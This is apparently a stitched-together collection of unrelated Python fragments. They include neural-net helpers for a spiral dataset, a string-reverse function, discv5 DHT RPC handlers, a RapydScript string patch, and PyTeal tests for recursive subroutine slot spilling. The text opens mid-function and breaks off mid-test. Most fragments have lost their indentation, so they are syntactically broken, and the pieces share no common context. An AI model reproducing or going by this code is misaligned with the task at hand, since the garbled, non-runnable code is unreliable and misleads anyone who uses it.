y = np.zeros(N * K, dtype='uint8') # class labels
for j in range(K):
ix = range(N * j, N * (j + 1))
r = np.linspace(0.0, 1, N) # radius
t = np.linspace(j * 4, (j + 1) * 4, N) + np.random.randn(N) * 0.2 # theta
X[ix] = np.c_[r * np.sin(t), r * np.cos(t)]
y[ix] = j
return X, y
def list_to_num(values):
    """Sums index * entry over a list - useful for converting a one-hot
    category list (a 1 in the ith entry) back into the number i."""
    result = 0
    for index, number in enumerate(values):
        result += index * number
    return result
@np.vectorize
def num_to_list_padded(integer, padding):
"""changes a number to a list with added padding"""
result = [0 for _ in range(padding)]
small_form = num_to_list(integer)
result[0:len(small_form)] = small_form
return result
@np.vectorize
def num_to_list(integer):
"""changes a number to a list - a quasi inverse of the list_to_num"""
result = [0 for _ in range(3)]
result[integer] = 1
return result
def initialize_new():
"""Initializes a new example neural net with one hidden layer."""
result = NeuralNet(2)
result.add_relu(100)
result.add_relu(3)
result.add_softmax()
result.add_cross_entropy_loss()
return result
def visualise(X, y):
"""plot a data set given X - coordinates and y - labels."""
plt.scatter(X[:, 0], X[:, 1], c=y, s=40, cmap=plt.cm.Spectral)
plt.show()
def train_ex(net, data, iters, learning_rate, initial_iteration=0):
"""Takes a neural network and trains it on the data given using gradient descent.
Learning rate decay is built in"""
for i in range(iters):
_learning_rate = learning_rate / (1 + i + initial_iteration)
if i % 100 == 99:
print(f'iteration: {i}')
print(f'learning rate: {_learning_rate}')
print(f'loss: {net.loss}')
for s in data:
net.forward_pass(s[0], s[1])
net.back_prop(s[1], learning_rate=_learning_rate)
def visualise_boundary(net, granularity):
"""visualise all the points in a grid by plotting which class would be predicted"""
x = np.linspace(-1.5, 1.5, granularity)
y = np.linspace(-1.5, 1.5, granularity)
xv, yv = np.meshgrid(x, y)
z = np.zeros((granularity, granularity))
for i in range(granularity):
for j in range(granularity):
z[i, j] = list_to_num(
np.round(net.forward_pass(np.array([[xv[i, j]], [yv[i, j]]]), y.transpose())))
plt.scatter(xv, yv, c=z, s=40, cmap=plt.cm.Spectral)
plt.show()
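# End-to-end sketch (the exact (input, label) encoding NeuralNet expects is an
# assumption; everything else comes from the functions above):
#     X, y = generate_data()
#     net = initialize_new()
#     data = list(zip(X, y))  # pairs of (coordinates, label)
#     train_ex(net, data, iters=1000, learning_rate=1.0)
#     visualise_boundary(net, granularity=50)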
| python |
def rev(string):
reverse_string = ''
for c in range(len(string)-1, -1, -1):
reverse_string += string[c]
return reverse_string
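# Example: rev("hello") -> "olleh". The slicing idiom "hello"[::-1] gives the
# same result without the quadratic string concatenation used above.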
| python |
from typing import Any, Iterable, Iterator, Mapping, Optional, Tuple, TypedDict, Union
from eth_enr import ENRAPI
from eth_enr.abc import ENRManagerAPI
from eth_enr.typing import ENR_KV
from eth_typing import HexStr
from eth_utils import (
encode_hex,
is_hex,
is_integer,
is_text,
to_bytes,
to_dict,
to_tuple,
)
from ddht.abc import RoutingTableAPI, RPCHandlerAPI, RPCRequest
from ddht.rpc import RPCError, RPCHandler
from ddht.v5_1.rpc_handlers import extract_params
class BucketInfo(TypedDict):
idx: int
nodes: Tuple[HexStr, ...]
replacement_cache: Tuple[HexStr, ...]
is_full: bool
class TableInfoResponse(TypedDict):
center_node_id: HexStr
num_buckets: int
bucket_size: int
buckets: Mapping[int, BucketInfo]
class RoutingTableInfoHandler(RPCHandler[None, TableInfoResponse]):
def __init__(self, routing_table: RoutingTableAPI) -> None:
self._routing_table = routing_table
def extract_params(self, request: RPCRequest) -> None:
if request.get("params"):
raise RPCError(f"Unexpected RPC params: {request['params']}",)
return None
async def do_call(self, params: None) -> TableInfoResponse:
stats = TableInfoResponse(
center_node_id=encode_hex(self._routing_table.center_node_id),
num_buckets=len(self._routing_table.buckets),
bucket_size=self._routing_table.bucket_size,
buckets=self._bucket_stats(),
)
return stats
@to_dict
def _bucket_stats(self) -> Iterator[Tuple[int, BucketInfo]]:
buckets_and_replacement_caches = zip(
self._routing_table.buckets, self._routing_table.replacement_caches,
)
for idx, (bucket, replacement_cache) in enumerate(
buckets_and_replacement_caches, start=1
):
if bucket:
yield (
idx,
BucketInfo(
idx=idx,
nodes=tuple(encode_hex(node_id) for node_id in bucket),
replacement_cache=tuple(
encode_hex(node_id) for node_id in replacement_cache
),
is_full=(len(bucket) >= self._routing_table.bucket_size),
),
)
class NodeInfoResponse(TypedDict):
node_id: HexStr
enr: str
class NodeInfoHandler(RPCHandler[None, NodeInfoResponse]):
_node_id_hex: HexStr
def __init__(self, enr: ENRAPI) -> None:
self._enr = enr
def extract_params(self, request: RPCRequest) -> None:
if request.get("params"):
raise RPCError(f"Unexpected RPC params: {request['params']}")
return None
async def do_call(self, params: None) -> NodeInfoResponse:
return NodeInfoResponse(
node_id=encode_hex(self._enr.node_id), enr=repr(self._enr),
)
@to_tuple
def normalize_and_validate_kv_pairs(
params: Any,
) -> Iterable[Tuple[bytes, Optional[bytes]]]:
if not params:
raise RPCError("Missing parameters.")
for kv_pair in params:
if len(kv_pair) != 2:
raise RPCError(f"Invalid kv_pair length: {len(kv_pair)}.")
raw_key, raw_value = kv_pair
if not is_hex(raw_key):
raise RPCError(
f"Key: {raw_key} is type: {type(raw_key)}. Keys must be hex-encoded strings."
)
key = to_bytes(hexstr=raw_key)
value: Union[bytes, None]
if not raw_value:
value = None
elif is_integer(raw_value):
value = to_bytes(raw_value)
elif is_text(raw_value) and is_hex(raw_value):
value = to_bytes(hexstr=raw_value)
else:
raise RPCError(
f"Value: {raw_value} is type: {type(raw_value)}. "
"Values must be hex-str, integer, or None."
)
yield key, value
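# Shape sketch (illustrative): params arrive as [key, value] pairs with
# hex-encoded keys and hex/int/None values, e.g.
#     [["0x746f706963", "0x01"], ["0x6970", 2130706433], ["0x746370", None]]
# which normalizes to
#     ((b"topic", b"\x01"), (b"ip", b"\x7f\x00\x00\x01"), (b"tcp", None))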
class UpdateNodeInfoHandler(RPCHandler[Tuple[ENR_KV, ...], NodeInfoResponse]):
_node_id_hex: HexStr
def __init__(self, enr_manager: ENRManagerAPI) -> None:
self._enr_manager = enr_manager
def extract_params(self, request: RPCRequest) -> Tuple[ENR_KV, ...]:
raw_params = extract_params(request)
kv_pairs = normalize_and_validate_kv_pairs(raw_params)
return kv_pairs
async def do_call(self, params: Tuple[ENR_KV, ...]) -> NodeInfoResponse:
self._enr_manager.update(*params)
return NodeInfoResponse(
node_id=encode_hex(self._enr_manager.enr.node_id),
enr=repr(self._enr_manager.enr),
)
@to_dict
def get_core_rpc_handlers(
enr_manager: ENRManagerAPI, routing_table: RoutingTableAPI
) -> Iterator[Tuple[str, RPCHandlerAPI]]:
yield ("discv5_routingTableInfo", RoutingTableInfoHandler(routing_table))
yield ("discv5_nodeInfo", NodeInfoHandler(enr_manager.enr))
yield ("discv5_updateNodeInfo", UpdateNodeInfoHandler(enr_manager))
| python |
# vim:fileencoding=utf-8
# License: BSD Copyright: 2016, Kovid Goyal <kovid at kovidgoyal.net>
# globals: ρσ_str
def strings():
string_funcs = set((
'capitalize strip lstrip rstrip islower isupper isspace lower upper swapcase'
' center count endswith startswith find rfind index rindex format join ljust rjust'
' partition rpartition replace split rsplit splitlines zfill'
).split(' '))
if not arguments.length:
exclude = {'split', 'replace'}
elif arguments[0]:
exclude = Array.prototype.slice.call(arguments)
else:
exclude = None
if exclude:
string_funcs = string_funcs.difference(set(exclude))
for name in string_funcs:
String.prototype[name] = ρσ_str.prototype[name]
| python |
from collections import OrderedDict
import pytest
from .. import *
from .subroutines import (
findRecursionPoints,
spillLocalSlotsDuringRecursion,
resolveSubroutines,
)
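# Shape note (inferred from the tests below, not from the implementation):
# findRecursionPoints maps each subroutine to the subset of its direct callees
# through which control can eventually return to that same subroutine, i.e.
# the call-graph edges that participate in a cycle involving it.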
def test_findRecursionPoints_empty():
subroutines = dict()
expected = dict()
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_findRecursionPoints_none():
def sub1Impl():
return None
def sub2Impl(a1):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutines = {
subroutine1: {subroutine2, subroutine3},
subroutine2: {subroutine3},
subroutine3: set(),
}
expected = {
subroutine1: set(),
subroutine2: set(),
subroutine3: set(),
}
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_findRecursionPoints_direct_recursion():
def sub1Impl():
return None
def sub2Impl(a1):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutines = {
subroutine1: {subroutine2, subroutine3},
subroutine2: {subroutine2, subroutine3},
subroutine3: set(),
}
expected = {
subroutine1: set(),
subroutine2: {subroutine2},
subroutine3: set(),
}
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_findRecursionPoints_mutual_recursion():
def sub1Impl():
return None
def sub2Impl(a1):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutines = {
subroutine1: {subroutine2, subroutine3},
subroutine2: {subroutine1, subroutine3},
subroutine3: set(),
}
expected = {
subroutine1: {subroutine2},
subroutine2: {subroutine1},
subroutine3: set(),
}
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_findRecursionPoints_direct_and_mutual_recursion():
def sub1Impl():
return None
def sub2Impl(a1):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutines = {
subroutine1: {subroutine2, subroutine3},
subroutine2: {subroutine1, subroutine2, subroutine3},
subroutine3: set(),
}
expected = {
subroutine1: {subroutine2},
subroutine2: {subroutine1, subroutine2},
subroutine3: set(),
}
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_spillLocalSlotsDuringRecursion_no_subroutines():
for version in (4, 5):
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
subroutineMapping = {None: mainOps}
subroutineGraph = dict()
localSlots = {None: set()}
spillLocalSlotsDuringRecursion(
version, subroutineMapping, subroutineGraph, localSlots
)
assert mainOps == [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
def test_spillLocalSlotsDuringRecursion_1_subroutine_no_recursion():
for version in (4, 5):
subroutine = SubroutineDefinition(lambda: None, TealType.uint64)
subroutineL1Label = LabelReference("l1")
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.err),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
subroutineMapping = {None: mainOps, subroutine: subroutineOps}
subroutineGraph = {subroutine: set()}
localSlots = {None: set(), subroutine: {0}}
spillLocalSlotsDuringRecursion(
version, subroutineMapping, subroutineGraph, localSlots
)
assert subroutineMapping == {
None: [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.err),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_1_subroutine_recursion_v4():
def sub1Impl(a1):
return None
subroutine = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutineL1Label = LabelReference("l1")
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
subroutineMapping = {None: mainOps, subroutine: subroutineOps}
subroutineGraph = {subroutine: {subroutine}}
localSlots = {None: set(), subroutine: {0}}
spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.dig, 1),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_1_subroutine_recursion_v5():
def sub1Impl(a1):
return None
subroutine = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutineL1Label = LabelReference("l1")
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
subroutineMapping = {None: mainOps, subroutine: subroutineOps}
subroutineGraph = {subroutine: {subroutine}}
localSlots = {None: set(), subroutine: {0}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.swap),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_multiple_subroutines_no_recursion():
for version in (4, 5):
def sub1Impl(a1):
return None
def sub2Impl(a1, a2):
return None
def sub3Impl(a1, a2, a3):
return None
        subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
        subroutine2 = SubroutineDefinition(sub2Impl, TealType.uint64)
        subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
subroutineGraph = {
subroutine1: {subroutine2},
subroutine2: set(),
subroutine3: set(),
}
        localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: set()}
spillLocalSlotsDuringRecursion(
version, subroutineMapping, subroutineGraph, localSlots
)
assert subroutineMapping == {
None: [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
],
subroutine1: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
],
subroutine2: [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
subroutine3: [
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_multiple_subroutines_recursion_v4():
def sub1Impl(a1):
return None
def sub2Impl(a1, a2):
return None
def sub3Impl(a1, a2, a3):
return None
    subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
    subroutine2 = SubroutineDefinition(sub2Impl, TealType.uint64)
    subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
subroutineGraph = {
subroutine1: {subroutine1},
subroutine2: {subroutine1},
subroutine3: {subroutine3},
}
    localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: set()}
spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
],
subroutine1: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.dig, 1),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
],
subroutine2: [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
subroutine3: [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_multiple_subroutines_recursion_v5():
def sub1Impl(a1):
return None
def sub2Impl(a1, a2):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine3 = SubroutineDefinition(sub1Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
subroutineGraph = {
subroutine1: {subroutine1},
subroutine2: {subroutine1},
subroutine3: {subroutine3},
}
    localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: set()}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
],
subroutine1: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.swap),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
],
subroutine2: [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
subroutine3: [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_many_args_no_return_v4():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.none)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
